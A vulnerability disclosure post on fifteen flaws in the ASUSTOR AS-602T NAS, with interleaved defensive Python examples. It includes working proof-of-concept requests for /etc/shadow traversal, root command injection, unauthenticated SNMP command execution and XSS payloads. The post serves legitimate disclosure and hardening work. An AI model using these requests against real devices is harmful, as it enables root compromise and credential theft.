Over a Dozen Vulnerabilities Discovered in ASUSTOR AS-602T

ISE Labs produces 15 CVEs in NAS device

Shaun Mirani
Independent Security Evaluators

--

ISE Labs has disclosed 15 vulnerabilities in the ASUSTOR AS-602T network-attached storage (NAS) device, firmware version ADM 3.1.1. This is the highest number of issues we have seen in a product in our most recent round of assessments. Given the device’s wide attack surface (it offers a web-based control panel and several network-accessible system services), we were able to uncover a diverse and severe set of flaws, ranging from cross-site scripting to root command injection. This blog post goes over the basic outline of each vulnerability and provides a proof of concept (PoC) where applicable.

For an in-depth walkthrough of exploiting one of these vulnerabilities, please refer to our last blog post on this device.

Cross-Site Scripting via SVG Images (CVE-2018-12305)

The File Explorer feature of the web interface allows users to upload files to the NAS and view them in a browser. An attacker can conduct cross-site scripting attacks against users of File Explorer by uploading an SVG image, with an extension of .png, that contains embedded JavaScript, such as the one below:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert(1);
</script>
</svg>

When a victim user views the file using the Preview in new Window functionality, the JavaScript contained in the SVG file will execute. Because the NAS sends session tokens in a URL parameter, the attacker’s JavaScript can access authentication data even though it operates in an XML Document context.
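The fix on the server side is to decide what a file is from its bytes, not from the extension the client chose, and to serve anything that is not a verifiable raster image as a download rather than as a document. The following is an added example (not ASUSTOR's code or the page's PoC) of that check; the advisory's SVG is embedded as a constructed upload labelled "cat.png", and the constructed PNG header stands in for a genuine image.

```python
import re

# Constructed sample: the advisory's SVG payload as it would arrive in an upload
# that the client labelled "cat.png".
SAMPLE_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert(1);
</script>
</svg>
"""

# Constructed sample: the first bytes of a genuine PNG (signature plus IHDR chunk header).
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR" + b"\x00" * 17

# Markup that turns an SVG into active content rather than a plain picture.
ACTIVE_SVG = re.compile(
    rb"<\s*script\b|\son[a-z]+\s*=|javascript\s*:|<\s*foreignObject\b",
    re.IGNORECASE,
)


def sniff_type(data: bytes) -> str:
    """Classify an upload by its bytes, ignoring the client-supplied name."""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data.startswith((b"GIF87a", b"GIF89a")):
        return "gif"
    head = data[:1024].lstrip().lower()
    if head.startswith(b"<") and b"<svg" in head:
        return "svg"
    return "unknown"


def declared_type(filename: str) -> str:
    """Type the client claimed, derived from the extension only."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return {"jpg": "jpeg"}.get(ext, ext)


def check_upload(data: bytes, filename: str) -> dict:
    """Compare claimed and actual type and look for script inside SVG."""
    actual = sniff_type(data)
    declared = declared_type(filename)
    mismatch = actual != declared
    active = actual == "svg" and ACTIVE_SVG.search(data) is not None
    return {
        "declared": declared,
        "actual": actual,
        "extension_mismatch": mismatch,
        "active_content": active,
        # Only render inline what is verifiably a raster image under its own name.
        "allow_inline_preview": actual in ("png", "jpeg", "gif") and not mismatch,
    }


def preview_headers(data: bytes, filename: str) -> dict:
    """Headers for the preview response: type taken from the bytes, nosniff so
    the browser does not second-guess it, and anything that is not a plain
    raster image served as an attachment instead of a document."""
    verdict = check_upload(data, filename)
    if verdict["allow_inline_preview"]:
        return {
            "Content-Type": f"image/{verdict['actual']}",
            "X-Content-Type-Options": "nosniff",
            "Content-Disposition": "inline",
        }
    return {
        "Content-Type": "application/octet-stream",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="download"',
        # Even if a browser did render it, a sandboxed CSP keeps scripts from running.
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
```

Note that this only removes the rendering vector; the second half of the finding, the session token travelling in a URL parameter, is fixed separately by keeping the token in an HttpOnly cookie so that script in any origin cannot read it.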

Directory Traversal via download.cgi (CVE-2018-12306)

By including path traversal characters in the file1 URL parameter in requests to /portal/apis/fileExplorer/download.cgi, an attacker with access to the web interface can download arbitrary system files. Because the web application process runs with root privileges, any file may be accessed through this vector. A proof-of-concept request to download /etc/shadow is shown below:

POST /portal/apis/fileExplorer/download.cgi?sid=e3bsWlCPAAAjp5Fb&act=download_sys_setting&file1=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fshadow&_dc=1525445693624 HTTP/1.1
Host: 192.168.1.119:8001
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.119:8001/portal/?5AEC4C55
Content-Type: multipart/form-data; boundary=---------------------------21202898831507825044124047157
Content-Length: 62
Cookie: as_admin=1; as_sid=wmvsWviSAACcoCFU; theme=themeBlue; as_account=admin; as_stay=1; as_lang=en-US; as_passport=vw4jIWMPKryHjBQKRC0tZ0
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------21202898831507825044124047157--

Command Injection in user.cgi (CVE-2018-12307)

When adding a system user using the endpoint /portal/apis/accessControl/user.cgi, the application backend does not properly validate or sanitize the username before passing it to the shell. As a result, an attacker with the ability to create new user accounts may execute arbitrary system commands as root. A proof-of-concept request to reboot the device is shown below:

POST /portal/apis/accessControl/user.cgi?sid=UanxWq8ZTxRQwst-&act=add&_dc=1525787023036 HTTP/1.1
Host: 192.168.1.119:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.119:8000/portal/?5AF1A877
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 175
Cookie: as_admin=1; theme=themeBlue; as_lang=en-US; as_login_error=5000; as_sid=UanxWq8ZTxRQwst-
Connection: close
name=test_rramgattie `reboot`&uid=1004&password=password&email=&description=test_rramgattie&change_password=1&enable_expire=0&expire_date=&gids=100&notification=0&admin_priv=0

Shared Folder Encryption Key Sent as URL Parameter (CVE-2018-12308)

The web interface of the NAS allows users to create shared folders, and optionally encrypt them using a password. This password is included in the URL of the initial request to create the folder, as well as a subsequent request seen below:

POST /portal/apis/accessControl/share.cgi?sid=RxbrWo6UMACCV2Vg&act=export_key&name=ja&encrypt_key=password&_dc=1525370963962 HTTP/1.1
Host: 192.168.1.119:8001
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.119:8001/portal/?5AEB0BDE
Content-Type: multipart/form-data; boundary=---------------------------72310334817476134770982115
Content-Length: 59
Cookie: as_admin=1; as_sid=RxbrWo6UMACCV2Vg; theme=themeBlue; as_account=admin; as_passport=p2bBBHlsbvtcuAYtkOsEZ/; as_stay=1; as_lang=en-US
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------72310334817476134770982115--

Directory Traversal via upload.cgi (CVE-2018-12309)

By including path traversal characters in the path URL parameter in POST requests to /portal/apis/fileExplorer/upload.cgi, an attacker can upload files to arbitrary locations on the NAS. Because the web application process runs with root privileges, there are no restrictions on the upload directory. A proof-of-concept request to place a file in /tmp is shown below:

POST /portal/apis/fileExplorer/upload.cgi?sid=Ja3sWr4X1gCfc6RK&act=upload&overwrite=1&path=%2FWeb%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp HTTP/1.1
Host: 192.168.1.119:8000
Content-Length: 203
Origin: http://192.168.1.119:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaKme0AzODGMQbfgs
Accept: */*
Referer: http://192.168.1.119:8000/portal/?5AECAD24
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: as_admin=1; theme=themeBlue; as_lang=en-US; as_account=admin; as_passport=dIjFig7guHsBg4hQX1KQa/; as_stay=1; as_sid=Ja3sWr4X1gCfc6RK
Connection: close
------WebKitFormBoundaryaKme0AzODGMQbfgs
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: text/plain
test
------WebKitFormBoundaryaKme0AzODGMQbfgs--

Note: manipulation of the filename POST parameter for directory traversal was identified in CVE-2018-11345.

Cross-Site Scripting on Login Page (CVE-2018-12310)

The web interface allows users to set a “system announcement” that appears on the login page of the application. By setting the announcement to a cross-site scripting payload, e.g. <img src=a onerror=alert(1)>, attackers can conduct cross-site scripting attacks to steal login credentials.

Missing Input Sanitization on File Explorer Filenames (CVE-2018-12311)

When using File Explorer to move a file whose name contains an XSS payload, e.g. <img src=a onerror=alert(document.cookie)>, the malicious JavaScript will evaluate in the user’s browser. Attackers who control the names of files on the device can leverage this to conduct cross-site scripting attacks against users of the web application.

Command Injection through 2FA Settings (CVE-2018-12312)

When adding a system user using the endpoint /portal/apis/accessControl/user.cgi, the application backend does not properly validate or sanitize the secret_key URL parameter, normally used for two-factor authentication, before passing it to the shell. As a result, an attacker with the ability to create new user accounts may execute arbitrary system commands as root. A proof-of-concept request to reboot the device is shown below:

POST /portal/apis/accessControl/user.cgi?sid=Y3LsWu95GgCsb40y&act=set_two_step_auth&enable_tw_step_auth=true&secret_key=%60reboot%200%60&verifycode=123456&_dc=1525445332602 HTTP/1.1
Host: 192.168.1.119:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.119:8000/portal/?
X-Requested-With: XMLHttpRequest
Cookie: as_admin=0; theme=themeBlue; as_lang=en-US; as_login_error=5000; as_sid=Y3LsWu95GgCsb40y
Connection: close
Content-Length: 0

Unauthenticated Command Injection in SNMP API (CVE-2018-12313)

The SNMP API endpoint at /portal/apis/services/snmp.cgi does not perform any authorization checks or input validation before adding user-specified values to the system-wide SNMP daemon configuration file. As a result, unauthenticated attackers may execute arbitrary system commands with root privileges. A proof-of-concept request to inject a whoami command is shown below:

GET /portal/apis/services/snmp.cgi?enable_snmp=1&rocommunity=bork%0Aextend+bork+/usr/bin/whoami&enable_snmp_v1v2=1&enable_snmp_v3=1&rouser=bork&passwd=password&trap_critical=1&trap_error=1&trap_warning=1&trap_information=0&trap_address=192.168.1.1 HTTP/1.1
Host: 192.168.1.119:8000

In this example, the rocommunity parameter contains URL-encoded newline characters (“%0A”) and an extend statement containing the malicious command.

Once the request returns, trigger the command and view its output using a utility such as snmpwalk:

snmpwalk -v1 -c bork 192.168.1.119 .1.3.6.1.4.1.8072.1.3.2

For a more detailed walkthrough of exploiting this vulnerability, refer to our previous article on this device, Unauthenticated Remote Code Execution in Asustor AS-602T (CVE-2018-12313).
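The root cause here is the missing authorization check, but the injection itself is a second bug: a community string containing a line break becomes a new snmpd.conf directive. The following added example (our own code, not ASUSTOR's) shows both halves of the defensive side: a request-log detector that flags snmp.cgi calls carrying line breaks or program-running directives in configuration fields, and an audit of the resulting snmpd.conf. The advisory's request line is embedded as it would appear in an access log; the snmpd.conf fragment and the community-string policy are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# snmpd.conf directives that run programs. A config the web UI only ever writes
# community and user lines into should never contain one of these.
EXEC_DIRECTIVE = re.compile(r"^\s*(extend|extendfix|exec|sh|pass|pass_persist|proxy)\b", re.I)

# Hypothetical community-string policy: one printable token, bounded length.
COMMUNITY_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

# snmp.cgi parameters whose values end up in the daemon configuration.
CONFIG_FIELDS = ("rocommunity", "rwcommunity", "rouser", "rwuser", "trap_address")

# The request line from the advisory, as it would appear in an access log.
PAGE_REQUEST = (
    "GET /portal/apis/services/snmp.cgi?enable_snmp=1&rocommunity=bork%0Aextend+bork+"
    "/usr/bin/whoami&enable_snmp_v1v2=1&enable_snmp_v3=1&rouser=bork&passwd=password"
    "&trap_critical=1&trap_error=1&trap_warning=1&trap_information=0"
    "&trap_address=192.168.1.1 HTTP/1.1"
)

# Constructed sample of the snmpd.conf fragment such a request would produce.
SNMPD_CONF = """# constructed sample
rocommunity bork
extend bork /usr/bin/whoami
rouser bork
"""


def validate_community(value: str) -> bool:
    """Server-side check: reject anything that is not a single plain token."""
    return COMMUNITY_RE.fullmatch(value) is not None


def flag_snmp_request(request_line: str) -> dict:
    """Inspect one access-log request line for snmp.cgi calls that smuggle a
    line break or an exec directive through a configuration field."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return {"snmp_cgi": False, "suspicious": False, "reasons": []}
    target = urlsplit(parts[1])
    if not target.path.endswith("/snmp.cgi"):
        return {"snmp_cgi": False, "suspicious": False, "reasons": []}
    # parse_qs decodes %0A to "\n" and "+" to a space, as the CGI would.
    params = parse_qs(target.query, keep_blank_values=True)
    reasons = []
    for key in CONFIG_FIELDS:
        for value in params.get(key, []):
            if "\n" in value or "\r" in value:
                reasons.append(f"{key}: embedded line break")
            for line in value.splitlines():
                if EXEC_DIRECTIVE.match(line):
                    reasons.append(f"{key}: exec directive {line.split()[0]!r}")
    return {"snmp_cgi": True, "suspicious": bool(reasons), "reasons": reasons}


def audit_snmpd_conf(text: str) -> list:
    """Return the lines of an snmpd.conf that would cause the daemon to run a program."""
    return [line.strip() for line in text.splitlines() if EXEC_DIRECTIVE.match(line)]
```

The detector is useful for hunting through historical logs for this pattern; the config audit is the post-incident check, since an injected `extend` line persists in snmpd.conf after the request that planted it is gone.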

Directory Traversal via downloadwallpaper.cgi (CVE-2018-12314)

By manipulating the file and folder URL parameters in requests to /portal/apis/wallpaper/downloadwallpaper.cgi, an attacker may download arbitrary files from the system. Because the web application process runs with root privileges, any file may be accessed through this vector. A proof-of-concept URL to download /etc/shadow is shown below:

https://192.168.1.119:8001/portal/apis/wallpaper/downloadwallpaper.cgi?sid=e3bsWlCPAAAjp5Fb&act=download&resize=0&file=shadow&folder=/home/admin/../../../../../../../../../etc
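The three traversal findings (download.cgi, upload.cgi and downloadwallpaper.cgi above) share one fix: decode the user-supplied path once, treat it as relative to the share's root, normalise it, and refuse it if the result is not still under that root. The following is an added example of that check (our own code, not ASUSTOR's); the root directories are hypothetical, since the device's volume layout is not on the page, and the three advisory inputs are embedded as constructed test strings.

```python
import os
import posixpath
from urllib.parse import unquote

# Hypothetical roots; the NAS's real volume layout is not given in the advisory.
SHARE_ROOT = "/volume1/Web"
WALLPAPER_ROOT = "/volume1/home/admin/wallpaper"

# The three traversal strings from the advisory, as constructed test inputs.
DOWNLOAD_FILE1 = "%2E%2E%2F" * 10 + "etc%2Fshadow"
UPLOAD_PATH = "%2FWeb%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp"
WALLPAPER_FOLDER = "/home/admin/../../../../../../../../../etc"


class PathEscape(ValueError):
    """Raised when a user-supplied path would leave its root."""


def resolve_within(root: str, user_path: str) -> str:
    """Lexically confine user_path to root. Decodes once (download.cgi received
    %2E%2E%2F, i.e. "../"), treats the value as relative even if it starts with
    "/", collapses "." and ".." and then checks the result is still under root."""
    decoded = unquote(user_path)
    if "\x00" in decoded:
        raise PathEscape("NUL byte in path")
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    root_norm = posixpath.normpath(root)
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        raise PathEscape(f"{decoded!r} resolves to {candidate}, outside {root}")
    return candidate


def resolve_on_disk(root: str, user_path: str) -> str:
    """Same check against the real filesystem, so a symlink planted under root
    (which the lexical check cannot see) is caught as well."""
    lexical = resolve_within(root, user_path)
    real = os.path.realpath(lexical)
    real_root = os.path.realpath(root)
    if real != real_root and not real.startswith(real_root + os.sep):
        raise PathEscape(f"{lexical} is a link to {real}, outside {root}")
    return real


def safe_filename(name: str) -> str:
    """For upload.cgi's filename field: keep only the final path component and
    refuse names that are empty or purely dots."""
    base = posixpath.basename(unquote(name).replace("\\", "/"))
    if base in ("", ".", "..") or "\x00" in base:
        raise PathEscape(f"unusable filename {name!r}")
    return base


def escapes(root: str, user_path: str) -> bool:
    """True if resolve_within would reject user_path for this root."""
    try:
        resolve_within(root, user_path)
    except PathEscape:
        return True
    return False
```

The lexical check alone is enough for the inputs in this post; `resolve_on_disk` is the version to use on a real volume, where a user who can already write files could plant a symlink that points outside the share. Running the CGI as an unprivileged user would also have limited what any of these traversals could reach.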

Password Change Does Not Require Existing Password (CVE-2018-12315)

When a user requests to change their password from the web application, the user is not required to input their current password.
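Requiring the current password turns a password change into a re-authentication step, so that a stolen session (for instance via the XSS findings above) cannot be converted into permanent account takeover. The following added example (our own code, not ASUSTOR's) shows the shape of a change-password handler that re-verifies first, rotates the stored hash, and drops every other session for the account; the in-memory store is a constructed stand-in for the device's account database.

```python
import hashlib
import hmac
import os


class AccountStore:
    """Constructed in-memory credential store standing in for the NAS's account database."""

    ITERATIONS = 100_000  # PBKDF2 work factor; tune to the hardware in real use

    def __init__(self):
        self._records = {}   # user -> (salt, derived key)
        self._sessions = {}  # user -> set of active session ids

    @staticmethod
    def _derive(password: str, salt: bytes) -> bytes:
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, AccountStore.ITERATIONS)

    def create(self, user: str, password: str) -> None:
        salt = os.urandom(16)
        self._records[user] = (salt, self._derive(password, salt))
        self._sessions[user] = set()

    def verify(self, user: str, password: str) -> bool:
        record = self._records.get(user)
        if record is None:
            self._derive(password, b"\x00" * 16)  # same cost for unknown users
            return False
        salt, key = record
        return hmac.compare_digest(key, self._derive(password, salt))

    def login(self, user: str, password: str, session_id: str) -> bool:
        if not self.verify(user, password):
            return False
        self._sessions[user].add(session_id)
        return True

    def active_sessions(self, user: str) -> set:
        return set(self._sessions.get(user, ()))

    def change_password(self, user: str, current: str, new: str, keep_session: str) -> str:
        """Re-authenticate with the current password before anything else, then
        rotate the hash and invalidate every session except the one that asked."""
        if not self.verify(user, current):
            return "rejected: current password incorrect"
        if len(new) < 12:
            return "rejected: new password too short"
        if self.verify(user, new):
            return "rejected: new password matches current"
        salt = os.urandom(16)
        self._records[user] = (salt, self._derive(new, salt))
        self._sessions[user] = {keep_session} if keep_session in self._sessions[user] else set()
        return "ok"
```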

Command Injection in upload.cgi (CVE-2018-12316)

The File Explorer feature of the web interface allows users to upload files to the NAS. An attacker with the ability to upload files may execute arbitrary system commands as root by issuing a POST request to /portal/apis/fileExplorer/upload.cgi with a filename parameter containing command substitution syntax, e.g. $(reboot).jpg.

Filenames of JPEG images are the most effective from an attacker’s standpoint, as they are used in a convert command shortly after upload.

Command Injection in group.cgi (CVE-2018-12317)

When adding a new user group using the endpoint /portal/apis/accessControl/group.cgi, the application backend does not properly validate or sanitize the group name before passing it to the shell. As a result, an attacker with the ability to create groups may execute arbitrary system commands as root. A proof-of-concept request to reboot the device is shown below:

POST /portal/apis/accessControl/group.cgi?sid=ZJD1WgrXMQiROeZl&act=add&_dc=1526042903471 HTTP/1.1
Host: 192.168.1.119:8001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.119:8001/portal/?5AF57FF4
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Cookie: as_admin=1; as_sid=ZJD1WgrXMQiROeZl; theme=window_themeGreen; as_account=bronald2; as_stay=1; as_lang=en-US; as_passport=PZs/TIe.MQ3h1chCnYyjI/
Connection: close
name=ise%60reboot+now%60&gid=1001&description=ise&members=
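The four command injections in this post (user.cgi usernames, the 2FA secret_key, upload.cgi filenames and group.cgi group names) are the same defect: a request value spliced into a string that /bin/sh then parses. The following added example (our own code, not ASUSTOR's) contrasts that shape with the hardened one: validate against an allowlist, then pass the value as its own argv element with no shell in between, and for uploads never hand the client's filename to convert at all. The name and secret policies are hypothetical, the Python interpreter stands in for useradd/convert as the child process, and the base32 secret is a constructed sample.

```python
import re
import subprocess
import sys
import uuid

# Hypothetical policies; the device's real rules are not on the page.
NAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")   # POSIX-portable account/group names
TOTP_SECRET_RE = re.compile(r"[A-Z2-7]{16,64}")   # RFC 4648 base32, as TOTP secrets are
IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}


def validate_name(name: str) -> bool:
    return NAME_RE.fullmatch(name) is not None


def validate_totp_secret(secret: str) -> bool:
    return TOTP_SECRET_RE.fullmatch(secret) is not None


def unsafe_command_line(name: str) -> str:
    """The vulnerable shape: the value is spliced into a string that /bin/sh
    will parse. Returned, never executed, so the backticks can be seen intact."""
    return f"useradd -m {name}"


def useradd_argv(name: str) -> list:
    """The hardened shape: validate, then hand the value to the program as its
    own argv element after "--" so it can never be read as an option either."""
    if not validate_name(name):
        raise ValueError(f"rejected account name {name!r}")
    return ["useradd", "-m", "--", name]


def child_sees(value: str) -> str:
    """Run a child with value as one argv element and return what it received.
    No shell is involved, so backticks and $(...) arrive as literal text."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


def staged_name(client_filename: str) -> str:
    """For upload.cgi: store the upload under a server-generated name and keep
    the client's filename only as metadata, so convert never sees it."""
    ext = client_filename.rsplit(".", 1)[-1].lower() if "." in client_filename else ""
    if ext not in IMAGE_EXT:
        raise ValueError(f"unsupported image type {ext!r}")
    return f"{uuid.uuid4().hex}.{ext}"
```

Passing the value as an argv element is what removes the injection; the allowlist is defence in depth that also keeps names usable by the rest of the system. Both together still leave the CGI running as root, which is why the impact of every injection here is a root shell; dropping privileges is the remaining change.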

snmp.cgi Returns Password in Cleartext (CVE-2018-12318)

When viewing the settings for SNMP via the Services section of the web application, the server responds with the current SNMP password in cleartext. Non-administrator users can retrieve this information as well. A proof-of-concept request to reveal the password is shown below:

POST /portal/apis/services/snmp.cgi?act=get&tab=Get&_dc=1530552418588 HTTP/1.1
Host: 192.168.1.19:8000
Content-Length: 0
Origin: http://192.168.1.19:8000
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36
Accept: */*
Referer: http://192.168.1.19:8000/portal/?5B3A5D0F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Login Denial of Service (CVE-2018-12319)

By setting the login page title to <script>alert(1)</script>, attackers with access to the web interface can cause the markup of the login page to fail to render, preventing users from signing in.

Disclosure Timeline

  • May 17, 2018: Reported vulnerabilities to ASUSTOR project manager
  • May 21, 2018: ASUSTOR acknowledged report and sent to R&D for verification
  • May 31, 2018: ASUSTOR released firmware version ADM 3.1.3.RHU2 to fix vulnerabilities
